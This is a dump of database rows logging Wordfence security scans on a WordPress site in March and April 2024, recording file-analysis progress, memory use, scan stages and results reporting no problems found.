(15464, 1711128798.775447, 2, 'info', 'Analyzed 4300 files containing 72.15 MB of data so far'),
(16531, 1712681599.775886, 10, 'info', 'SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),
(15841, 1711645562.400742, 2, 'info', 'Scanned contents of 50 additional files at 4.54 per second'),
(15272, 1710867653.335770, 2, 'info', 'Analyzed 2400 files containing 41.54 MB of data so far'),
(15472, 1711128802.334445, 2, 'info', 'Analyzed 5100 files containing 98.48 MB of data so far'),
(15473, 1711128802.712123, 2, 'info', 'Analyzed 5200 files containing 102.32 MB of data so far'),
(15474, 1711128802.928140, 2, 'info', 'Analyzed 5300 files containing 103.97 MB of data so far'),
(15264, 1710867651.816946, 2, 'info', 'Analyzed 1600 files containing 28.05 MB of data so far'),
(16325, 1712422403.114437, 2, 'info', 'Analyzed 3200 files containing 61.58 MB of data so far'),
(15775, 1711645532.950407, 2, 'info', 'Analyzed 700 files containing 16.81 MB of data so far'),
(15776, 1711645533.053699, 2, 'info', 'Analyzed 800 files containing 17.23 MB of data so far'),
(15500, 1711128808.166212, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(15501, 1711128808.166550, 2, 'info', 'Done examining URLs'),
(15639, 1711384962.649804, 2, 'info', 'Analyzed 4500 files containing 72.48 MB of data so far'),
(15279, 1710867657.554453, 2, 'info', 'Analyzed 3100 files containing 58.03 MB of data so far'),
(16275, 1712422387.376558, 10, 'info', 'SUM_START:Fetching list of known core files from Wordfence'),
(16276, 1712422387.378750, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),
(16277, 1712422387.427016, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(15622, 1711384956.439627, 2, 'info', 'Analyzed 2800 files containing 45.25 MB of data so far'),
(16002, 1711903813.171402, 2, 'info', 'Analyzed 5600 files containing 112.02 MB of data so far'),
(16000, 1711903812.356310, 2, 'info', 'Analyzed 5400 files containing 105.99 MB of data so far'),
(16001, 1711903812.906875, 2, 'info', 'Analyzed 5500 files containing 110.27 MB of data so far'),
(15623, 1711384957.131074, 2, 'info', 'Analyzed 2900 files containing 51.93 MB of data so far'),
(15889, 1711772722.771767, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(16086, 1712162952.438967, 2, 'info', 'The disk has 1777096.64 MB available'),
(15981, 1711903807.460292, 2, 'info', 'Analyzed 3500 files containing 66.82 MB of data so far'),
(15979, 1711903803.493381, 2, 'info', 'Analyzed 3300 files containing 62.87 MB of data so far'),
(15980, 1711903803.993370, 2, 'info', 'Analyzed 3400 files containing 63.86 MB of data so far'),
(15724, 1711645508.603198, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 28th of March 2024 05:05:08 PM'),
(16004, 1711903813.416868, 2, 'info', 'Analyzed 5740 files containing 114.12 MB of data.'),
(16473, 1712681582.228486, 2, 'info', 'Analyzed 500 files containing 13.57 MB of data so far'),
(16472, 1712681582.058140, 2, 'info', 'Analyzed 400 files containing 12.11 MB of data so far'),
(16471, 1712681581.320234, 2, 'info', 'Analyzed 300 files containing 3.63 MB of data so far'),
(16478, 1712681582.898389, 2, 'info', 'Analyzed 1000 files containing 17.22 MB of data so far'),
(16322, 1712422401.648602, 2, 'info', 'Analyzed 2900 files containing 51.91 MB of data so far'),
(16487, 1712681584.421533, 2, 'info', 'Analyzed 1900 files containing 28.59 MB of data so far'),
(15599, 1711384950.948097, 2, 'info', 'Analyzed 500 files containing 14.27 MB of data so far'),
(15598, 1711384950.786028, 2, 'info', 'Analyzed 400 files containing 12.04 MB of data so far'),
(15597, 1711384949.918589, 2, 'info', 'Analyzed 300 files containing 3.61 MB of data so far'),
(15593, 1711384949.218619, 2, 'info', '5500 files indexed'),
(15258, 1710867650.721317, 2, 'info', 'Analyzed 1000 files containing 18.14 MB of data so far'),
(16483, 1712681584.165216, 2, 'info', 'Analyzed 1500 files containing 26.93 MB of data so far'),
(15591, 1711384949.154054, 2, 'info', '4500 files indexed'),
(15592, 1711384949.185156, 2, 'info', '5000 files indexed'),
(16484, 1712681584.213159, 2, 'info', 'Analyzed 1600 files containing 27.33 MB of data so far'),
(16326, 1712422403.450375, 2, 'info', 'Analyzed 3300 files containing 62.76 MB of data so far'),
(15476, 1711128803.580772, 2, 'info', 'Analyzed 5500 files containing 110.38 MB of data so far'),
(15294, 1710867659.679147, 2, 'info', 'Analyzed 4600 files containing 73.37 MB of data so far'),
(16528, 1712681599.642072, 10, 'info', 'SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),
(15834, 1711645551.389836, 2, 'info', 'Starting scan of file contents'),
(15985, 1711903808.201369, 2, 'info', 'Analyzed 3900 files containing 71.02 MB of data so far'),
(15984, 1711903808.057594, 2, 'info', 'Analyzed 3800 files containing 70.27 MB of data so far'),
(15606, 1711384952.743898, 2, 'info', 'Analyzed 1200 files containing 22.05 MB of data so far'),
(16446, 1712681580.080382, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(16447, 1712681580.599847, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(16278, 1712422387.430201, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(15290, 1710867659.296252, 2, 'info', 'Analyzed 4200 files containing 71.95 MB of data so far'),
(15291, 1710867659.382320, 2, 'info', 'Analyzed 4300 files containing 72.12 MB of data so far'),
(15292, 1710867659.470246, 2, 'info', 'Analyzed 4400 files containing 72.22 MB of data so far'),
(15293, 1710867659.565310, 2, 'info', 'Analyzed 4500 files containing 72.44 MB of data so far'),
(15624, 1711384957.463307, 2, 'info', 'Analyzed 3000 files containing 54.51 MB of data so far'),
(15432, 1711128792.986458, 2, 'info', 'Analyzed 1100 files containing 19.09 MB of data so far'),
(15433, 1711128793.260311, 2, 'info', 'Analyzed 1200 files containing 22.05 MB of data so far'),
(15434, 1711128793.697334, 2, 'info', 'Analyzed 1300 files containing 26.68 MB of data so far'),
(15435, 1711128793.764325, 2, 'info', 'Analyzed 1400 files containing 27.01 MB of data so far'),
(15436, 1711128793.841211, 2, 'info', 'Analyzed 1500 files containing 27.25 MB of data so far'),
(16215, 1712162973.688024, 1, 'info', '-------------------'),
(16213, 1712162973.682297, 2, 'info', 'Done examining URLs'),
(16216, 1712162973.688452, 2, 'info', 'Wordfence used 13.5 MB of memory for scan. Server peak memory usage was: 85 MB'),
(15471, 1711128800.888269, 2, 'info', 'Analyzed 5000 files containing 82.14 MB of data so far'),
(15265, 1710867651.874464, 2, 'info', 'Analyzed 1700 files containing 28.49 MB of data so far'),
(16315, 1712422399.310369, 2, 'info', 'Analyzed 2200 files containing 33.89 MB of data so far'),
(15605, 1711384952.281718, 2, 'info', 'Analyzed 1100 files containing 19.09 MB of data so far'),
(15604, 1711384952.035379, 2, 'info', 'Analyzed 1000 files containing 18.15 MB of data so far'),
(15603, 1711384951.850941, 2, 'info', 'Analyzed 900 files containing 17.82 MB of data so far'),
(15986, 1711903808.332392, 2, 'info', 'Analyzed 4000 files containing 71.3 MB of data so far'),
(15602, 1711384951.600704, 2, 'info', 'Analyzed 800 files containing 17.23 MB of data so far'),
(15601, 1711384951.449103, 2, 'info', 'Analyzed 700 files containing 16.81 MB of data so far'),
(15988, 1711903808.571388, 2, 'info', 'Analyzed 4200 files containing 71.87 MB of data so far'),
(15987, 1711903808.467376, 2, 'info', 'Analyzed 4100 files containing 71.57 MB of data so far'),
(16377, 1712422423.582876, 10, 'info', 'SUM_START:Scanning comments for URLs on a domain blocklist'),
(16378, 1712422423.614446, 10, 'info', 'SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),
(16379, 1712422423.628556, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(16380, 1712422423.634095, 2, 'info', 'Starting password strength check on 2 users.'),
(16381, 1712422423.672993, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(16382, 1712422423.682558, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(16383, 1712422424.858999, 10, 'info', 'SUM_ENDOK:Scanning for old themes, plugins and core files'),
(16384, 1712422424.867767, 10, 'info', 'SUM_START:Scanning for admin users not created through WordPress'),
(16385, 1712422425.139342, 10, 'info', 'SUM_ENDOK:Scanning for admin users not created through WordPress'),
(16386, 1712422425.148296, 10, 'info', 'SUM_START:Scanning for suspicious site options'),
(16387, 1712422425.189984, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(15467, 1711128800.088696, 2, 'info', 'Analyzed 4600 files containing 73.4 MB of data so far'),
(15468, 1711128800.245806, 2, 'info', 'Analyzed 4700 files containing 75.86 MB of data so far'),
(15640, 1711384962.808271, 2, 'info', 'Analyzed 4600 files containing 73.4 MB of data so far'),
(15518, 1711128809.409745, 1, 'info', 'Scan Complete. Scanned 5741 files, 6 plugins, 4 themes, 22 posts, 0 comments and 212 URLs in 26 seconds.'),
(16236, 1712294463.027181, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(15902, 1711903785.180849, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 31st of March 2024 04:49:45 PM'),
(16235, 1712294463.026041, 1, 'info', '-------------------'),
(15904, 1711903788.079511, 1, 'info', 'Contacting Wordfence to initiate scan'),
(16273, 1712422387.368744, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(15852, 1711645562.771701, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(15853, 1711645562.772176, 2, 'info', 'Done examining URLs'),
(16569, 1712725023.341992, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(16162, 1712162963.970489, 2, 'info', 'Analyzed 4200 files containing 71.94 MB of data so far'),
(16161, 1712162961.955413, 2, 'info', 'Analyzed 4100 files containing 71.66 MB of data so far'),
(15972, 1711903800.923120, 2, 'info', 'Analyzed 2600 files containing 42.88 MB of data so far'),
(16160, 1712162961.855297, 2, 'info', 'Analyzed 4000 files containing 71.38 MB of data so far'),
(16159, 1712162961.755349, 2, 'info', 'Analyzed 3900 files containing 71.09 MB of data so far'),
(16158, 1712162961.473304, 2, 'info', 'Analyzed 3800 files containing 70.32 MB of data so far'),
(15417, 1711128790.762916, 2, 'info', '4000 files indexed'),
(15527, 1711172740.691023, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(16133, 1712162956.829542, 2, 'info', 'Analyzed 1300 files containing 26.68 MB of data so far'),
(15461, 1711128798.488262, 2, 'info', 'Analyzed 4000 files containing 71.42 MB of data so far'),
(16135, 1712162957.014328, 2, 'info', 'Analyzed 1500 files containing 27.25 MB of data so far'),
(16134, 1712162956.924963, 2, 'info', 'Analyzed 1400 files containing 27.01 MB of data so far'),
(16340, 1712422407.244743, 2, 'info', 'Analyzed 4700 files containing 75.89 MB of data so far'),
(15379, 1711128783.077337, 1, 'info', 'Contacting Wordfence to initiate scan'),
(15712, 1711515126.801287, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16073, 1712119912.922209, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(16324, 1712422402.529242, 2, 'info', 'Analyzed 3100 files containing 59.85 MB of data so far'),
(16323, 1712422402.026394, 2, 'info', 'Analyzed 3000 files containing 54.16 MB of data so far'),
(15333, 1710867668.450226, 2, 'info', 'Starting password strength check on 2 users.'),
(15743, 1711645529.233299, 2, 'info', 'Found 6 plugins'),
(15744, 1711645529.233591, 2, 'info', 'Getting theme list from WordPress'),
(16199, 1712162972.094621, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(16200, 1712162972.094946, 2, 'info', 'Done examining URLs'),
(15271, 1710867652.901071, 2, 'info', 'Analyzed 2300 files containing 36.46 MB of data so far'),
(16311, 1712422398.083851, 2, 'info', 'Analyzed 1800 files containing 27.95 MB of data so far'),
(15745, 1711645529.239774, 2, 'info', 'Found 4 themes'),
(15415, 1711128790.696649, 2, 'info', '3000 files indexed'),
(15416, 1711128790.727257, 2, 'info', '3500 files indexed'),
(15414, 1711128790.609458, 2, 'info', '2500 files indexed'),
(16439, 1712681580.046910, 10, 'info', 'SUM_ENDOK:Checking for future GeoIP support'),
(16047, 1711952832.247563, 1, 'info', 'Initiating quick scan'),
(16438, 1712681580.043614, 10, 'info', 'SUM_START:Checking for future GeoIP support'),
(16563, 1712681611.084520, 2, 'info', 'Done examining URLs'),
(16564, 1712681611.103441, 10, 'info', 'SUM_ENDOK:Scanning for suspicious site options'),
(15610, 1711384953.914576, 2, 'info', 'Analyzed 1600 files containing 28.08 MB of data so far'),
(15880, 1711693177.188297, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(15316, 1710867667.531980, 2, 'info', 'Scanned contents of 44 additional files at 17.76 per second'),
(16293, 1712422388.235024, 2, 'info', '5765 files indexed'),
(16294, 1712422388.400306, 2, 'info', 'Analyzed 100 files containing 1.13 MB of data so far'),
(15314, 1710867665.053226, 2, 'info', 'Starting scan of file contents'),
(15315, 1710867666.189874, 2, 'info', 'Scanned contents of 29 additional files at 25.54 per second'),
(15282, 1710867658.118842, 2, 'info', 'Analyzed 3400 files containing 63.91 MB of data so far'),
(16367, 1712422423.430233, 2, 'info', 'Done host key check.'),
(16132, 1712162956.378668, 2, 'info', 'Analyzed 1200 files containing 22.05 MB of data so far'),
(15711, 1711515126.798966, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(15629, 1711384961.319398, 2, 'info', 'Analyzed 3500 files containing 66.87 MB of data so far'),
(15628, 1711384961.028787, 2, 'info', 'Analyzed 3400 files containing 63.95 MB of data so far'),
(15627, 1711384960.867369, 2, 'info', 'Analyzed 3300 files containing 62.98 MB of data so far'),
(15341, 1710867669.766664, 2, 'info', 'Done examining URLs'),
(15340, 1710867669.766110, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(15674, 1711384973.138312, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(15267, 1710867652.022398, 2, 'info', 'Analyzed 1900 files containing 29.31 MB of data so far'),
(16571, 1712725023.351161, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(15569, 1711384948.104312, 2, 'info', 'Found 6 plugins'),
(15568, 1711384948.101738, 2, 'info', 'Getting plugin list from WordPress'),
(15974, 1711903801.194370, 2, 'info', 'Analyzed 2800 files containing 45.15 MB of data so far'),
(15826, 1711645549.481331, 2, 'info', 'Analyzed 5740 files containing 114.12 MB of data.'),
(16175, 1712162967.747247, 2, 'info', 'Analyzed 5500 files containing 108.76 MB of data so far'),
(16176, 1712162967.934498, 2, 'info', 'Analyzed 5600 files containing 112.13 MB of data so far'),
(16177, 1712162968.086848, 2, 'info', 'Analyzed 5700 files containing 113.33 MB of data so far'),
(16178, 1712162968.179443, 2, 'info', 'Analyzed 5781 files containing 114.71 MB of data.'),
(15778, 1711645533.417460, 2, 'info', 'Analyzed 1000 files containing 18.15 MB of data so far'),
(15643, 1711384963.552987, 2, 'info', 'Analyzed 4900 files containing 80.47 MB of data so far'),
(16352, 1712422416.149291, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(15662, 1711384970.729197, 2, 'info', 'Scanned contents of 36 additional files at 16.88 per second'),
(16474, 1712681582.389216, 2, 'info', 'Analyzed 600 files containing 14.57 MB of data so far'),
(16370, 1712422423.451484, 10, 'info', 'SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),
(16368, 1712422423.438209, 2, 'info', 'Done file contents scan'),
(16369, 1712422423.441284, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(15348, 1710914957.290925, 1, 'info', 'Initiating quick scan'),
(15844, 1711645562.466075, 2, 'info', 'Checking 205 host keys against Wordfence scanning servers.'),
(15253, 1710867650.104200, 2, 'info', 'Analyzed 500 files containing 14.27 MB of data so far'),
(15252, 1710867649.874046, 2, 'info', 'Analyzed 400 files containing 12.03 MB of data so far'),
(15251, 1710867649.135345, 2, 'info', 'Analyzed 300 files containing 3.6 MB of data so far'),
(16532, 1712681599.820929, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(16533, 1712681599.823624, 10, 'info', 'SUM_START:Scanning file contents for URLs on a domain blocklist'),
(16117, 1712162953.937702, 2, 'info', '4500 files indexed'),
(16371, 1712422423.460039, 10, 'info', 'SUM_START:Scanning for publicly accessible quarantined files'),
(16372, 1712422423.463236, 10, 'info', 'SUM_ENDOK:Scanning for publicly accessible quarantined files'),
(16373, 1712422423.476128, 10, 'info', 'SUM_START:Scanning posts for URLs on a domain blocklist'),
(16374, 1712422423.541789, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(16375, 1712422423.542276, 2, 'info', 'Done examining URLs'),
(16336, 1712422406.337753, 2, 'info', 'Analyzed 4300 files containing 71.96 MB of data so far'),
(16017, 1711903818.555359, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(16018, 1711903818.557067, 2, 'info', 'Checking 205 host keys against Wordfence scanning servers.'),
(15281, 1710867657.972342, 2, 'info', 'Analyzed 3300 files containing 62.95 MB of data so far'),
(15280, 1710867657.794390, 2, 'info', 'Analyzed 3200 files containing 61.66 MB of data so far'),
(15439, 1711128794.002614, 2, 'info', 'Analyzed 1800 files containing 28.74 MB of data so far'),
(15720, 1711599503.910077, 1, 'info', '-------------------'),
(16143, 1712162958.102318, 2, 'info', 'Analyzed 2300 files containing 36.37 MB of data so far'),
(16489, 1712681584.685489, 2, 'info', 'Analyzed 2100 files containing 29.89 MB of data so far'),
(16422, 1712638405.920250, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16423, 1712638405.920466, 10, 'info', 'SUM_FINAL:Scan complete. Congratulations, no new problems found.'),
(16067, 1712119912.639043, 1, 'info', 'Initiating quick scan'),
(16488, 1712681584.527470, 2, 'info', 'Analyzed 2000 files containing 28.99 MB of data so far'),
(15368, 1711082860.321603, 1, 'info', 'Initiating quick scan'),
(16466, 1712681580.816033, 2, 'info', '5000 files indexed'),
(16464, 1712681580.776493, 2, 'info', '4000 files indexed'),
(16465, 1712681580.801322, 2, 'info', '4500 files indexed'),
(16481, 1712681583.945478, 2, 'info', 'Analyzed 1300 files containing 25.96 MB of data so far'),
(15531, 1711256218.697077, 1, 'info', 'Initiating quick scan'),
(15935, 1711903795.239440, 2, 'info', '500 files indexed'),
(15516, 1711128809.408501, 1, 'info', '-------------------'),
(15517, 1711128809.409008, 2, 'info', 'Wordfence used 18.5 MB of memory for scan. Server peak memory usage was: 85 MB'),
(15998, 1711903811.861212, 2, 'info', 'Analyzed 5200 files containing 102.2 MB of data so far'),
(16312, 1712422398.299625, 2, 'info', 'Analyzed 1900 files containing 28.59 MB of data so far'),
(15820, 1711645547.980329, 2, 'info', 'Analyzed 5200 files containing 102.2 MB of data so far'),
(15821, 1711645548.265447, 2, 'info', 'Analyzed 5300 files containing 103.96 MB of data so far'),
(15424, 1711128791.341246, 2, 'info', 'Analyzed 300 files containing 3.61 MB of data so far'),
(15423, 1711128791.184451, 2, 'info', 'Analyzed 200 files containing 2.37 MB of data so far'),
(15422, 1711128791.021373, 2, 'info', 'Analyzed 100 files containing 1.11 MB of data so far'),
(15421, 1711128790.883881, 2, 'info', '5741 files indexed'),
(15665, 1711384972.743735, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(16343, 1712422408.240730, 2, 'info', 'Analyzed 5000 files containing 80.97 MB of data so far'),
(16342, 1712422407.969779, 2, 'info', 'Analyzed 4900 files containing 80.48 MB of data so far'),
(16341, 1712422407.675101, 2, 'info', 'Analyzed 4800 files containing 78.49 MB of data so far'),
(16127, 1712162955.674310, 2, 'info', 'Analyzed 700 files containing 16.81 MB of data so far'),
(16126, 1712162955.542642, 2, 'info', 'Analyzed 600 files containing 15.54 MB of data so far'),
(15442, 1711128794.297311, 2, 'info', 'Analyzed 2100 files containing 30.11 MB of data so far'),
(16335, 1712422406.187412, 2, 'info', 'Analyzed 4200 files containing 71.83 MB of data so far'),
(16540, 1712681608.770185, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(16541, 1712681608.771149, 2, 'info', 'Checking 65 host keys against Wordfence scanning servers.'),
(16334, 1712422405.942519, 2, 'info', 'Analyzed 4100 files containing 71.46 MB of data so far'),
(15437, 1711128793.902055, 2, 'info', 'Analyzed 1600 files containing 28.08 MB of data so far'),
(15244, 1710867648.492067, 2, 'info', '4000 files indexed'),
(15245, 1710867648.507619, 2, 'info', '4500 files indexed'),
(15296, 1710867660.198597, 2, 'info', 'Analyzed 4800 files containing 78.51 MB of data so far'),
(16539, 1712681608.769794, 2, 'info', 'Scanned contents of 25 additional files at 3.96 per second'),
(15302, 1710867663.145774, 2, 'info', 'Analyzed 5400 files containing 106.07 MB of data so far'),
(15297, 1710867660.403961, 2, 'info', 'Analyzed 4900 files containing 80.44 MB of data so far'),
(15298, 1710867660.648285, 2, 'info', 'Analyzed 5000 files containing 82.1 MB of data so far'),
(15299, 1710867662.185225, 2, 'info', 'Analyzed 5100 files containing 98.45 MB of data so far'),
(15300, 1710867662.640535, 2, 'info', 'Analyzed 5200 files containing 102.28 MB of data so far'),
(15301, 1710867662.867556, 2, 'info', 'Analyzed 5300 files containing 103.94 MB of data so far'),
(16461, 1712681580.722695, 2, 'info', '2500 files indexed'),
(16063, 1712033088.875502, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(15278, 1710867654.793271, 2, 'info', 'Analyzed 3000 files containing 54.48 MB of data so far'),
(16408, 1712552811.952541, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(15702, 1711428789.004696, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(16506, 1712681590.007244, 2, 'info', 'Analyzed 3800 files containing 70.41 MB of data so far'),
(15637, 1711384962.421244, 2, 'info', 'Analyzed 4300 files containing 72.15 MB of data so far'),
(15477, 1711128803.691239, 2, 'info', 'Analyzed 5600 files containing 112.13 MB of data so far'),
(15478, 1711128803.868311, 2, 'info', 'Analyzed 5700 files containing 113.53 MB of data so far'),
(15982, 1711903807.655874, 2, 'info', 'Analyzed 3600 files containing 67.98 MB of data so far'),
(16480, 1712681583.512753, 2, 'info', 'Analyzed 1200 files containing 22.19 MB of data so far'),
(16479, 1712681583.101990, 2, 'info', 'Analyzed 1100 files containing 18.42 MB of data so far'),
(15879, 1711693177.186903, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(15878, 1711693177.186305, 1, 'info', '-------------------'),
(16505, 1712681588.883256, 2, 'info', 'Analyzed 3700 files containing 69.62 MB of data so far'),
(16521, 1712681595.439784, 2, 'info', 'Analyzed 5300 files containing 103.61 MB of data so far'),
(16282, 1712422387.479384, 2, 'info', '500 files indexed'),
(15570, 1711384948.104623, 2, 'info', 'Getting theme list from WordPress'),
(15843, 1711645562.464191, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(15958, 1711903798.498375, 2, 'info', 'Analyzed 1200 files containing 22.05 MB of data so far'),
(16510, 1712681590.407227, 2, 'info', 'Analyzed 4200 files containing 71.83 MB of data so far'),
(16511, 1712681590.508311, 2, 'info', 'Analyzed 4300 files containing 71.96 MB of data so far'),
(15962, 1711903799.206675, 2, 'info', 'Analyzed 1600 files containing 28.08 MB of data so far'),
(16398, 1712469388.181463, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(15256, 1710867650.529339, 2, 'info', 'Analyzed 800 files containing 17.23 MB of data so far'),
(15463, 1711128798.684415, 2, 'info', 'Analyzed 4200 files containing 71.98 MB of data so far'),
(15425, 1711128792.095804, 2, 'info', 'Analyzed 400 files containing 12.04 MB of data so far'),
(15802, 1711645542.502329, 2, 'info', 'Analyzed 3400 files containing 63.86 MB of data so far'),
(15803, 1711645542.813297, 2, 'info', 'Analyzed 3500 files containing 66.82 MB of data so far'),
(16357, 1712422416.271811, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(16356, 1712422416.262660, 10, 'info', 'SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),
(15411, 1711128790.452858, 2, 'info', '1000 files indexed'),
(15412, 1711128790.482359, 2, 'info', '1500 files indexed'),
(16313, 1712422398.499505, 2, 'info', 'Analyzed 2000 files containing 28.99 MB of data so far'),
(15989, 1711903808.660420, 2, 'info', 'Analyzed 4300 files containing 72.04 MB of data so far'),
(15990, 1711903808.747457, 2, 'info', 'Analyzed 4400 files containing 72.14 MB of data so far'),
(15644, 1711384963.783581, 2, 'info', 'Analyzed 5000 files containing 82.14 MB of data so far'),
(16279, 1712422387.430773, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(16095, 1712162952.472506, 2, 'info', 'Found 6 plugins'),
(16096, 1712162952.472664, 2, 'info', 'Getting theme list from WordPress'),
(16329, 1712422404.762368, 2, 'info', 'Analyzed 3600 files containing 67.87 MB of data so far'),
(15888, 1711772722.770918, 1, 'info', '-------------------'),
(16289, 1712422388.082630, 2, 'info', '4000 files indexed'),
(16288, 1712422388.048804, 2, 'info', '3500 files indexed'),
(16094, 1712162952.471026, 2, 'info', 'Getting plugin list from WordPress'),
(15465, 1711128798.860332, 2, 'info', 'Analyzed 4400 files containing 72.25 MB of data so far'),
(15466, 1711128798.954372, 2, 'info', 'Analyzed 4500 files containing 72.48 MB of data so far'),
(16512, 1712681590.622320, 2, 'info', 'Analyzed 4400 files containing 72.05 MB of data so far'),
(16513, 1712681590.715291, 2, 'info', 'Analyzed 4500 files containing 72.28 MB of data so far'),
(16514, 1712681590.848430, 2, 'info', 'Analyzed 4600 files containing 73.74 MB of data so far'),
(15645, 1711384965.351225, 2, 'info', 'Analyzed 5100 files containing 98.48 MB of data so far'),
(15646, 1711384965.842364, 2, 'info', 'Analyzed 5200 files containing 102.32 MB of data so far'),
(15647, 1711384966.140171, 2, 'info', 'Analyzed 5300 files containing 103.97 MB of data so far'),
(15648, 1711384966.437978, 2, 'info', 'Analyzed 5400 files containing 106.1 MB of data so far'),
(15649, 1711384966.878535, 2, 'info', 'Analyzed 5500 files containing 110.38 MB of data so far'),
(15650, 1711384967.011371, 2, 'info', 'Analyzed 5600 files containing 112.13 MB of data so far'),
(15692, 1711384975.003837, 1, 'info', 'Scan Complete. Scanned 5741 files, 6 plugins, 4 themes, 22 posts, 0 comments and 230 URLs in 33 seconds.'),
(15801, 1711645542.342382, 2, 'info', 'Analyzed 3300 files containing 62.87 MB of data so far'),
(15800, 1711645542.021753, 2, 'info', 'Analyzed 3200 files containing 61.59 MB of data so far'),
(15254, 1710867650.284000, 2, 'info', 'Analyzed 600 files containing 15.53 MB of data so far'),
(15255, 1710867650.422387, 2, 'info', 'Analyzed 700 files containing 16.8 MB of data so far'),
(15890, 1711772722.773708, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16389, 1712422425.195834, 10, 'info', 'SUM_ENDOK:Scanning for suspicious site options'),
(16390, 1712422425.209043, 1, 'info', '-------------------'),
(16391, 1712422425.209884, 2, 'info', 'Wordfence used 11.5 MB of memory for scan. Server peak memory usage was: 85 MB'),
(16392, 1712422425.211139, 1, 'info', 'Scan Complete. Scanned 5765 files, 6 plugins, 4 themes, 22 posts, 0 comments and 41 URLs in 48 seconds.'),
(16393, 1712422425.211419, 10, 'info', 'SUM_FINAL:Scan complete. Congratulations, no new problems found.'),
(15783, 1711645534.945481, 2, 'info', 'Analyzed 1500 files containing 27.25 MB of data so far'),
(16491, 1712681585.298180, 2, 'info', 'Analyzed 2300 files containing 35.77 MB of data so far'),
(16097, 1712162952.485792, 2, 'info', 'Found 4 themes'),
(16397, 1712469388.175881, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(15997, 1711903811.357254, 2, 'info', 'Analyzed 5100 files containing 98.4 MB of data so far'),
(15842, 1711645562.445933, 2, 'info', 'Scanned contents of 51 additional files at 4.61 per second'),
(15462, 1711128798.582369, 2, 'info', 'Analyzed 4100 files containing 71.68 MB of data so far'),
(15992, 1711903808.957025, 2, 'info', 'Analyzed 4600 files containing 73.3 MB of data so far'),
(16395, 1712469388.172168, 1, 'info', 'Initiating quick scan'),
(15257, 1710867650.619764, 2, 'info', 'Analyzed 900 files containing 17.81 MB of data so far'),
(16396, 1712469388.175348, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(15594, 1711384949.232399, 2, 'info', '5741 files indexed'),
(15595, 1711384949.426490, 2, 'info', 'Analyzed 100 files containing 1.11 MB of data so far'),
(15953, 1711903797.652386, 2, 'info', 'Analyzed 700 files containing 16.81 MB of data so far'),
(15950, 1711903797.000249, 2, 'info', 'Analyzed 400 files containing 12.04 MB of data so far'),
(15951, 1711903797.162608, 2, 'info', 'Analyzed 500 files containing 14.27 MB of data so far'),
(15952, 1711903797.450828, 2, 'info', 'Analyzed 600 files containing 15.54 MB of data so far'),
(15772, 1711645532.120369, 2, 'info', 'Analyzed 400 files containing 12.04 MB of data so far'),
(15771, 1711645531.208365, 2, 'info', 'Analyzed 300 files containing 3.61 MB of data so far'),
(16350, 1712422415.984040, 2, 'info', 'Analyzed 5700 files containing 113.39 MB of data so far'),
(16351, 1712422416.148970, 2, 'info', 'Analyzed 5765 files containing 114.5 MB of data.'),
(16445, 1712681580.069642, 2, 'info', 'Found 4 themes'),
(15287, 1710867658.994269, 2, 'info', 'Analyzed 3900 files containing 71.1 MB of data so far'),
(16567, 1712681611.109596, 1, 'info', 'Scan Complete. Scanned 5765 files, 6 plugins, 4 themes, 22 posts, 0 comments and 41 URLs in 38 seconds.'),
(16074, 1712119912.924414, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
